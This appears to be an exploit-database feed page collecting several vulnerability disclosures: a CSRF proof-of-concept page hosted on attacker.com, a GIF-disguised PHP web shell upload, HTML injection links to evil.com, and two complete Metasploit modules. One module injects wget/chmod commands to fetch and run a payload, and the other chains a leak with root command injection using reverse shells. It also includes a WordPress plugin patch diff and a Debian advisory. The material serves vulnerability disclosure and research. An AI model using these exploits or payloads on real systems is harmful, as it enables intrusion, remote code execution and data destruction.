Online Examination System Project version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)# Google Dork: n/a# Date: 09/06/2023# Exploit Author: Ramil Mustafayev (kryptohaker)# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Version: 1.0# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28# CVE : n/aOnline Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.To exploit this vulnerability, an attacker needs to do the following:1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:<html>  <body>    <form action="http://example.com/update.php" method="GET">      <input type="hidden" name="demail" value="victim@example.com" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html5. Send the URL of the HTML page to the admin user via email, social media, or any other means.If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.

Online Examination System Project 1.0 Cross Site Request Forgery

Teachers Record Management System version 1.0 suffers from file upload validation bypass vulnerability.

    Exploit Title: Teachers Record Management System 1.0 – File Upload Type ValidationDate: 17-01-2023EXPLOIT-AUTHOR: AFFAN AHMEDVendor Homepage: <https://phpgurukul.com>Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>Version: 1.0Tested on: Windows 11 + XAMPPCVE : CVE-2023-3187===============================STEPS_TO_REPRODUCE===============================1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”Password: Test@123”2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image3. Open the Burp-suite and Intercept the Edit Image Request4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”5. Change the **Content-type from “ image/png “ to “ image/gif “6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**8. Below is the Burpsuite-POST Request for all the changes that I have made above==========================================BURPSUITE_REQUEST==========================================POST /trms/teacher/changeimage.php HTTP/1.1Host: localhostContent-Length: 442Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: <http://localhost>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: <http://localhost/trms/teacher/changeimage.php>Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qcConnection: close------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="subjects"John Doe------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"Content-Type: image/gifGIF89a <?php echo system($_REQUEST['dx']); ?>------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="submit"------WebKitFormBoundaryndAPYa0GGOxSUHdF--===============================PROOF_OF_CONCEPT===============================GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md

Teachers Record Management System 1.0 Validation Bypass

Sales Tracker Management System version 1.0 suffers from an html injection vulnerability.

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities   
Google Dork: NA  
Date: 09-06-2023  
EXPLOIT-AUTHOR: AFFAN AHMED  
Vendor Homepage: <https://www.sourcecodester.com/>  
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>  
Version: 1.0  
Tested on: Windows 11 + XAMPP  
CVE : CVE-2023-3184

==============================  
CREDENTIAL TO USE  
==============================  
ADMIN-ACCOUNT  
USERNAME: admin  
PASSWORD: admin123

=============================  
PAYLOAD_USED  
=============================  
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>

===============================  
STEPS_TO_REPRODUCE  
===============================  
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN   
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`   
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username`   
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON  
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .  
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE

==========================================  
BURPSUITE_REQUEST  
==========================================  
POST /php-sts/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 1037  
sec-ch-ua:   
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36  
sec-ch-ua-platform: ""  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-sts/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn  
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="id"

------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="password"

1234  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="type"

2  
------WebKitFormBoundary7hwjNQW3mptDFOwo  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================  
PROOF_OF_CONCEPT  
===============================  
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Sales Tracker Management System 1.0 HTML Injection

This Metasploit module exploits an unauthenticated command injection vulnerability in /controller/ping.php in Symmetricom SyncServer. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',        'Description' => %q{          This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.          The S100 through S350 (End of Life) models should be vulnerable to          unauthenticated exploitation due to a session handling vulnerability.          Later models require authentication which is not provided in this module because we can't test it.          The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).          Run 'check' first to determine if vulnerable.          The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT          and LPORT while testing this module.        },        'Author' => [          'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module          'Justin Fatuch Apt4hax', # Exploit PoC          'Robert Bronstein' # Metasploit Module        ],        'References' => [          ['CVE', '2022-40022'],          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']        ],        'DisclosureDate' => '2022-08-31',        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Arch' => [ARCH_X86, ARCH_X64],        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )    register_options(      [        OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),        OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),        OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])      ], self.class    )  end  def primer; end  def on_request_uri(cli, req)    @pl = generate_payload_exe    print_status("#{peer} - Payload request received: #{req.uri}")    send_response(cli, @pl)  end  def check    uri = '/controller/ping.php'    res = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'vars_post' =>          {            'currentTab' => 'ping',            'refreshMode' => 'dirty',            'ethDirty' => 'false',            'snmpCfgDirty' => 'false',            'snmpTrapDirty' => 'false',            'pingDirty' => 'true',            'hostname' => "\`id\`",            'port' => 'eth0',            'pingType' => 'ping'          }    })    if res && res.body.to_s =~ /uid=0/      Exploit::CheckCode::Vulnerable    else      Exploit::CheckCode::Safe    end  end  def request(cmd)    uri = '/controller/ping.php'    send_request_cgi({      'method' => 'POST',      'Content-Type' => 'application/x-www-form-encoded',      'uri' => uri,      'vars_post' =>      {        'currentTab' => 'ping',        'refreshMode' => 'dirty',        'ethDirty' => 'false',        'snmpCfgDirty' => 'false',        'snmpTrapDirty' => 'false',        'pingDirty' => 'true',        'hostname' => cmd,        'port' => 'eth0',        'pingType' => 'ping'      }    })  end  def exploit    srvhost = datastore['SRVHOST']    srvport = datastore['SRVPORT']    filename = datastore['FILENAME']    resource_uri = '/' + filename    shell_path = '/tmp/'    cmds = [      "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",      "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",      "\`" + shell_path + filename + "\`"    ]    start_service({      'Uri' => {        'Proc' => proc { |cli, req|                    on_request_uri(cli, req)                  },        'Path' => resource_uri      }    })    print_status("#{rhost}:#{rport} - Exploit started...")    print_status("#{rhost}:#{rport} - Sending wget command...")    request(cmds[0])    sleep(3)    print_status("#{rhost}:#{rport} - Making payload executable...")    request(cmds[1])    sleep(3)    print_status("#{rhost}:#{rport} - Executing payload...")    request(cmds[2])    sleep(3)  endend

Symmetricom SyncServer Unauthenticated Remote Command Execution

The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_message function. This makes it possible for unauthenticated attackers to update new order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-3200: mstore-api.php in mstore-api/trunk – WordPress Plugin Repository

The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**mstore-api/trunk/assets/js/mstore-inspireui.js**

r2610824

r2925048

 

22

22

    $(document).on('blur', '.mstore-update-limit-product', function () {

23

23

        var limit = $(this).val();

 

24

        var nonce = $(this).data('nonce');

24

25

        $.ajax({

25

26

            type: 'post',

…

…

 

27

28

            data: {

28

29

                action: 'mstore\_update\_limit\_product',

29

 

                limit: limit

 

30

                limit: limit,

 

31

                nonce: nonce

30

32

            },

31

33

            success: function (result) {

…

…

 

39

41

    $(document).on('blur', '.mstore-update-firebase-server-key', function () {

40

42

        var serverKey = $(this).val();

 

43

        var nonce = $(this).data('nonce');

41

44

        $.ajax({

42

45

            type: 'post',

…

…

 

44

47

            data: {

45

48

                action: 'mstore\_update\_firebase\_server\_key',

46

 

                serverKey: serverKey

 

49

                serverKey: serverKey,

 

50

                nonce: nonce

47

51

            },

48

52

            success: function (result) {

…

…

 

56

60

    $(document).on('blur', '.mstore-update-new-order-title', function () {

57

61

        var title = $(this).val();

 

62

        var nonce = $(this).data('nonce');

58

63

        $.ajax({

59

64

            type: 'post',

…

…

 

61

66

            data: {

62

67

                action: 'mstore\_update\_new\_order\_title',

63

 

                title: title

 

68

                title: title,

 

69

                nonce: nonce

64

70

            },

65

71

            success: function (result) {

…

…

 

73

79

    $(document).on('blur', '.mstore-update-new-order-message', function () {

74

80

        var message = $(this).val();

 

81

        var nonce = $(this).data('nonce');

75

82

        $.ajax({

76

83

            type: 'post',

…

…

 

78

85

            data: {

79

86

                action: 'mstore\_update\_new\_order\_message',

80

 

                message: message

 

87

                message: message,

 

88

                nonce: nonce

81

89

            },

82

90

            success: function (result) {

…

…

 

90

98

    $(document).on('blur', '.mstore-update-status-order-title', function () {

91

99

        var title = $(this).val();

 

100

        var nonce = $(this).data('nonce');

92

101

        $.ajax({

93

102

            type: 'post',

…

…

 

95

104

            data: {

96

105

                action: 'mstore\_update\_status\_order\_title',

97

 

                title: title

 

106

                title: title,

 

107

                nonce: nonce

98

108

            },

99

109

            success: function (result) {

…

…

 

107

117

    $(document).on('blur', '.mstore-update-status-order-message', function () {

108

118

        var message = $(this).val();

 

119

        var nonce = $(this).data('nonce');

109

120

        $.ajax({

110

121

            type: 'post',

…

…

 

112

123

            data: {

113

124

                action: 'mstore\_update\_status\_order\_message',

114

 

                message: message

 

125

                message: message,

 

126

                nonce: nonce

115

127

            },

116

128

            success: function (result) {

**mstore-api/trunk/controllers/flutter-booking.php**

r2924554

r2925048

 

188

188

        global $wpdb;

189

189

        $table\_name = $wpdb->prefix . "wc\_appointment\_relationships";

190

 

        $items = $wpdb->get\_results("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

190

        $sql = $wpdb->prepare("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

191

        $items = $wpdb->get\_results($sql);

191

192

        foreach ($items as $item) {

192

193

            $user = get\_user\_by("ID", $item->staff\_id);

**mstore-api/trunk/controllers/flutter-wholesale.php**

r2924554

r2925048

 

75

75

        $role = $params\["role"\];

76

76

       

77

 

        if (isset($role) && in\_array($role, \['administrator','owner'\], true)) {

 

77

        if (!class\_exists('WooCommerceWholeSalePrices')) {

 

78

            return parent::sendError("invalid\_plugin", "You need to install WooCommerce Wholesale Prices plugin to use this api", 404);

 

79

        }

 

80

        global $wc\_wholesale\_prices;

 

81

        $data =  $wc\_wholesale\_prices->wwp\_wholesale\_roles->getAllRegisteredWholesaleRoles();

 

82

        $roles = \[\];

 

83

        $roles = array\_keys($data);

 

84

        $roles\[\] = 'subscriber';

 

85

        if (!isset($role) || !in\_array($role,$roles, true)) {

78

86

            return parent::sendError("invalid\_role", "Role is invalid.", 400);

79

87

        }

**mstore-api/trunk/mstore-api.php**

r2924554

r2925048

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.6

 

6

 \* Version: 3.9.7

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

41

41

class MstoreCheckOut

42

42

{

43

 

    public $version = '3.9.6';

 

43

    public $version = '3.9.7';

44

44

45

45

    public function \_\_construct()

…

…

 

213

213

214

214

    function mstore\_delete\_json\_file(){

215

 

        if(current\_user\_can( 'edit\_posts' )){

 

215

        if(checkIsAdmin(get\_current\_user\_id())){

216

216

            $id = sanitize\_text\_field($\_REQUEST\['id'\]);

217

217

            $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

218

218

            FlutterUtils::delete\_config\_file($id, $nonce);

 

219

        }else{

 

220

            wp\_send\_json\_error('No Permission',401);

219

221

        }

220

222

    }

…

…

 

222

224

    function mstore\_update\_limit\_product()

223

225

    {

224

 

        if(current\_user\_can( 'edit\_posts' )){

 

226

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

227

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_limit\_product')){

225

228

            $limit = sanitize\_text\_field($\_REQUEST\['limit'\]);

226

229

            if (is\_numeric($limit)) {

227

230

                update\_option("mstore\_limit\_product", intval($limit));

228

231

            }

 

232

        }else{

 

233

            wp\_send\_json\_error('No Permission',401);

229

234

        }

230

235

    }

…

…

 

232

237

    function mstore\_update\_firebase\_server\_key()

233

238

    {

234

 

        if(current\_user\_can( 'edit\_posts' )){

 

239

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

240

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_firebase\_server\_key')){

235

241

            $serverKey = sanitize\_text\_field($\_REQUEST\['serverKey'\]);

236

242

            update\_option("mstore\_firebase\_server\_key", $serverKey);

 

243

        }else{

 

244

            wp\_send\_json\_error('No Permission',401);

237

245

        }

238

246

    }

…

…

 

240

248

    function mstore\_update\_new\_order\_title()

241

249

    {

242

 

        if(current\_user\_can( 'edit\_posts' )){

 

250

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

251

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_title')){

243

252

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

244

253

            update\_option("mstore\_new\_order\_title", $title);

 

254

        }else{

 

255

            wp\_send\_json\_error('No Permission',401);

245

256

        }

246

257

    }

…

…

 

248

259

    function mstore\_update\_new\_order\_message()

249

260

    {

250

 

        if(current\_user\_can( 'edit\_posts' )){

 

261

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

262

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_message')){

251

263

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

252

264

            update\_option("mstore\_new\_order\_message", $message);

 

265

        }else{

 

266

            wp\_send\_json\_error('No Permission',401);

253

267

        }

254

268

    }

…

…

 

256

270

    function mstore\_update\_status\_order\_title()

257

271

    {

258

 

        if(current\_user\_can( 'edit\_posts' )){

 

272

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

273

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_title')){

259

274

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

260

275

            update\_option("mstore\_status\_order\_title", $title);

 

276

        }else{

 

277

            wp\_send\_json\_error('No Permission',401);

261

278

        }

262

279

    }

…

…

 

264

281

    function mstore\_update\_status\_order\_message()

265

282

    {

266

 

        if(current\_user\_can( 'edit\_posts' )){

 

283

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

284

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_message')){

267

285

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

268

286

            update\_option("mstore\_status\_order\_message", $message);

 

287

        }else{

 

288

            wp\_send\_json\_error('No Permission',401);

269

289

        }

270

290

    }

**mstore-api/trunk/readme.txt**

r2924554

r2925048

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.6

 

6

Stable tag:        3.9.7

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.7 =

 

47

  \* Fix security issues

 

48

46

49

\= 3.9.6 =

47

50

  \* Fix security issues

**mstore-api/trunk/templates/admin/mstore-api-admin-dashboard.php**

r2924554

r2925048

 

74

74

        ?>

75

75

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

76

 

            <input type="number" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

 

76

            <input type="number" data-nonce="<?php echo wp\_create\_nonce('update\_limit\_product'); ?>" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

77

77

                   class="mstore-update-limit-product">

78

78

        </div>

…

…

 

88

88

        ?>

89

89

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

90

 

            <textarea class="mstore-update-firebase-server-key mstore\_input"

 

90

            <textarea data-nonce="<?php echo wp\_create\_nonce('update\_firebase\_server\_key'); ?>" class="mstore-update-firebase-server-key mstore\_input"

91

91

                      style="height: 120px"><?php echo esc\_attr($serverKey) ?></textarea>

92

92

        </div>

…

…

 

108

108

        ?>

109

109

        <div class="form-group" style="margin-top:10px;">

110

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($newOrderTitle); ?>"

 

110

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_title'); ?>" value="<?php echo esc\_attr($newOrderTitle); ?>"

111

111

                   class="mstore-update-new-order-title mstore\_input">

112

112

        </div>

113

113

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

114

 

            <textarea placeholder="Message" class="mstore-update-new-order-message mstore\_input"

 

114

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_message'); ?>" class="mstore-update-new-order-message mstore\_input"

115

115

                      style="height: 120px"><?php echo esc\_attr($newOrderMsg); ?></textarea>

116

116

        </div>

…

…

 

132

132

        ?>

133

133

        <div class="form-group" style="margin-top:10px;">

134

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($statusOrderTitle); ?>"

 

134

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_title'); ?>" value="<?php echo esc\_attr($statusOrderTitle); ?>"

135

135

                   class="mstore-update-status-order-title mstore\_input">

136

136

        </div>

137

137

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

138

 

            <textarea placeholder="Message" class="mstore-update-status-order-message mstore\_input"

 

138

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_message'); ?>" class="mstore-update-status-order-message mstore\_input"

139

139

                      style="height: 120px"><?php echo esc\_attr($statusOrderMsg); ?></textarea>

140

140

        </div>

CVE-2023-3201: Changeset 2925048 for mstore-api – WordPress Plugin Repository

This Metasploit module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS versions 4.2.29 and below by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information" and CVE-2022-24989, "Authenticated remote code execution". Exploiting vulnerable endpoint api.php?mobile/webNasIPS leaking sensitive information such as admin password hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint api.php?mobile/createRaid with POST parameters raidtype and diskstring to execute remote code as root on TerraMaster NAS devices.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'require 'time'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29          and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"          and CVE-2022-24989, "Authenticated remote code execution".          Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password          hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root          on TerraMaster NAS devices.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Octagon Networks', # Discovery          '0xf4n9x' # POC        ],        'References' => [          ['CVE', '2022-24990'],          ['CVE', '2022-24989'],          ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],          ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],          ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']        ],        'DisclosureDate' => '2022-03-07',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8181,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])    ])  end  def get_data    # Initialise variable data to store the leaked data    @data = {}    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`    # CVE-2022-24990    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),      'headers' => {        'User-Agent' => 'TNAS'      }    })    if res && res.code == 200 && res.body.include?('webNasIPS successful')      # Parse the JSON response and get the data such as admin password hash and MAC address      res_json = res.get_json_document      unless res_json.blank?        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip        @data['key'] = @data['mac'][6..11] # last three MAC address entries        @data['timestamp'] = Time.new.to_i.to_s        # derive signature        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])      end    end  end  def tos_encrypt_str(key, str_to_encrypt)    id = key + str_to_encrypt    return Digest::MD5.hexdigest(id.encode('utf-8'))  end  def execute_command(cmd, _opts = {})    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`    # CVE-2022-24989    diskstring = Rex::Text.rand_text_alpha_upper(4..8)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'User-Agent' => 'TNAS',        'Authorization' => @data['password'],        'Signature' => @data['signature'],        'Timestamp' => @data['timestamp']      },      'vars_post' => {        'raidtype' => ';' + cmd,        'diskstring' => diskstring.to_s      }    })  end  def get_terramaster_info    # get Terramaster CPU architecture (X64 or ARM64) and TOS version    @terramaster = {}    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')    })    if res && res.body && res.code == 200      # get the version information from the request response like below:      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>      return if res.body.match(/ver=.+?"/).nil?      version = res.body.match(/ver=.+?"/)[0]      # check if architecture is ARM64 or X64      if version.match(/_A/)        @terramaster['cpu_arch'] = 'ARM64'      elsif version.match(/_S/) || version.match(/_Q/)        @terramaster['cpu_arch'] = 'X64'      else        @terramaster['cpu_arch'] = 'UNKNOWN'      end      # strip TOS version number and remove trailing double quote.      @terramaster['tos_version'] = version.split('.0_')[1].chop    end  end  def check    get_terramaster_info    return CheckCode::Safe if @terramaster.empty?    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    end    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")  end  def exploit    get_data    fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager(linemax: 65536)    end  endend

TerraMaster TOS 4.2.29 Remote Code Execution

Debian Linux Security Advisory 5425-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

